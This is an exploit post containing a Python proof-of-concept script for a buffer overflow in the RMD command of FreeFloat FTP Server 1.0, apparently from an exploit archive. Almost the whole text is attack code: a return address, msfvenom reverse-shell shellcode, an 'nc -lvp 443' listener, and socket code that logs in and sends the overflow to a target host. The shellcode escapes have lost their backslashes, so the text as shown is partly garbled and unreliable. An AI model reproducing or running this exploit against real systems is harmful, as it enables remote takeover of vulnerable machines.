Freefloat FTP Server 1.0 RMD Buffer Overflow
Posted on 02 November 2016
#!/usr/bin/env python # -*- coding: utf-8 -*- import socket #Exploit Title: FreeFloat FTP Server Buffer Overflow RMD command #Date: 29 Octubre 2016 #Exploit Author: Karri93 #Software Link: http://www.freefloat.com/software/freefloatftpserver.zip #Version: 1.0 #Tested on: Windows XP Profesional SP3 Spanish x86 #Shellcode Metasploit: #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.7 LPORT=443 -b 'x00x0Ax0D' -f -c #nc -lvp 443 ret= "x2Fx1DxF1x77" #GDI32.dll shellcode=("xd9xc4xd9x74x24xf4x5bx33xc9xb1x52xbax9bx84x71" "xb0x83xc3x04x31x53x13x03xc8x97x93x45x12x7fxd1" "xa6xeax80xb6x2fx0fxb1xf6x54x44xe2xc6x1fx08x0f" "xacx72xb8x84xc0x5axcfx2dx6exbdxfexaexc3xfdx61" "x2dx1exd2x41x0cxd1x27x80x49x0cxc5xd0x02x5ax78" "xc4x27x16x41x6fx7bxb6xc1x8cxccxb9xe0x03x46xe0" "x22xa2x8bx98x6axbcxc8xa5x25x37x3ax51xb4x91x72" "x9ax1bxdcxbax69x65x19x7cx92x10x53x7ex2fx23xa0" "xfcxebxa6x32xa6x78x10x9ex56xacxc7x55x54x19x83" "x31x79x9cx40x4ax85x15x67x9cx0fx6dx4cx38x4bx35" "xedx19x31x98x12x79x9ax45xb7xf2x37x91xcax59x50" "x56xe7x61xa0xf0x70x12x92x5fx2bxbcx9ex28xf5x3b" "xe0x02x41xd3x1fxadxb2xfaxdbxf9xe2x94xcax81x68" "x64xf2x57x3ex34x5cx08xffxe4x1cxf8x97xeex92x27" "x87x11x79x40x22xe8xeaxafx1bxf3xedx47x5exf3xf0" "x2cxd7x15x98x42xbex8ex35xfax9bx44xa7x03x36x21" "xe7x88xb5xd6xa6x78xb3xc4x5fx89x8exb6xf6x96x24" "xdex95x05xa3x1exd3x35x7cx49xb4x88x75x1fx28xb2" "x2fx3dxb1x22x17x85x6ex97x96x04xe2xa3xbcx16x3a" "x2bxf9x42x92x7ax57x3cx54xd5x19x96x0ex8axf3x7e" "xd6xe0xc3xf8xd7x2cxb2xe4x66x99x83x1bx46x4dx04" "x64xbaxedxebxbfx7ex1dxa6x9dxd7xb6x6fx74x6axdb" "x8fxa3xa9xe2x13x41x52x11x0bx20x57x5dx8bxd9x25" "xcex7exddx9axefxaa") buffer= 'x90'*30 + shellcode buffer1= 'x41' * 248 + ret + buffer + 'x43'*(696-len(buffer)) print "Sending..." s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('192.168.1.150',21)) s.recv(1024) s.send('USER free ') s.recv(1024) s.send('PASS free ') s.recv(1024) s.send('RMD' + buffer1 + ' ') s.close()
